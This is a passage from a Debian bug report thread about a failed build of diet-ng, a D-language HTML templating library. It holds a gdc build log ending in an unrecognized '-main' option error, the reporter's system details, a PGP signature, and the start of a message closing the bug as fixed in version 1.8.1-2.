-fstack-protector-strong -Wformat -Werror=format-security -funittest -MD -MQ 'test_diet@exe/source_diet_html.d.o' -MF 'test_diet@exe/source_diet_html.d.o.deps' -o 'test_diet@exe/source_diet_html.d.o' -c ../source/diet/html.d d21: warning: command line option ‘-Wformat=1’ is valid for C/C++/ObjC/ObjC++ but not for D d21: warning: ‘-Werror=’ argument ‘-Werror=format-security’ is not valid for D [18/18] gdc -o test_diet 'test_diet@exe/source_diet_defs.d.o' 'test_diet@exe/source_diet_dom.d.o' 'test_diet@exe/source_diet_html.d.o' 'test_diet@exe/source_diet_input.d.o' 'test_diet@exe/source_diet_internal_html.d.o' 'test_diet@exe/source_diet_internal_string.d.o' 'test_diet@exe/source_diet_parser.d.o' 'test_diet@exe/source_diet_traits.d.o' -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong -Wformat -Werror=format-security -Wl,-z,relro -main FAILED: test_diet gdc -o test_diet 'test_diet@exe/source_diet_defs.d.o' 'test_diet@exe/source_diet_dom.d.o' 'test_diet@exe/source_diet_html.d.o' 'test_diet@exe/source_diet_input.d.o' 'test_diet@exe/source_diet_internal_html.d.o' 'test_diet@exe/source_diet_internal_string.d.o' 'test_diet@exe/source_diet_parser.d.o' 'test_diet@exe/source_diet_traits.d.o' -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong -Wformat -Werror=format-security -Wl,-z,relro -main gdc: error: unrecognized command line option ‘-main’; did you mean ‘-Wmain’? ninja: build stopped: subcommand failed. dh_auto_build: cd obj-arm-linux-gnueabihf && LC_ALL=C.UTF-8 ninja -j8 -v returned exit code 1 make: *** [debian/rules:8: build-arch] Error 255 - -- System Information: Debian Release: bullseye/sid APT prefers testing APT policy: (990, 'testing'), (500, 'testing-debug') Architecture: amd64 (x86_64) Kernel: Linux 5.2.0-3-amd64 (SMP w/2 CPU cores) Kernel taint flags: TAINT_PROPRIETARY_MODULE, TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE=en_US:en (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: systemd (via /run/systemd/system) LSM: AppArmor: enabled -BEGIN PGP SIGNATURE- iQEzBAEBCAAdFiEEWLZtSHNr6TsFLeZynFyZ6wW9dQoFAl3LGAEACgkQnFyZ6wW9 dQqvZAf/eINqgAMxixHxbvRUgtnBK5HjnSlmZYPzoRFLEoguPYT+qcgB79SvYSZ+ ppTiLPCnvc4t9ypBaR0jIuGGHFoFYBwPgLDKyCllLYOLxBzGXLb+/m9oWaD4Dgjk SsK+LO1DOAkEjUdbmdT5eR3H8XQFCQ4Bc7XR47E27jpHwYKp/Ag3TUrVh//H1h8z y3IaNa3gbIr1andMRHgChe42xHFHRTpEi4yNDkbMqc7SV/vLJWRSZCbSC58WCQJK KRsT9feH3SqlhgwFtFcTM3N6I3p6Tvqmb0nGRWHzigiWV9mgOn62NueydkxurzaD 3GNNSC9u64EHKSg/Qwbc3jqXbU1OJA== =1qQc -END PGP SIGNATURE- --- End Message --- --- Begin Message --- Source: diet-ng Source-Version: 1.8.1-2 Done: Nilesh Patra We believe that the bug you reported is fixed in the latest version of diet-ng, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have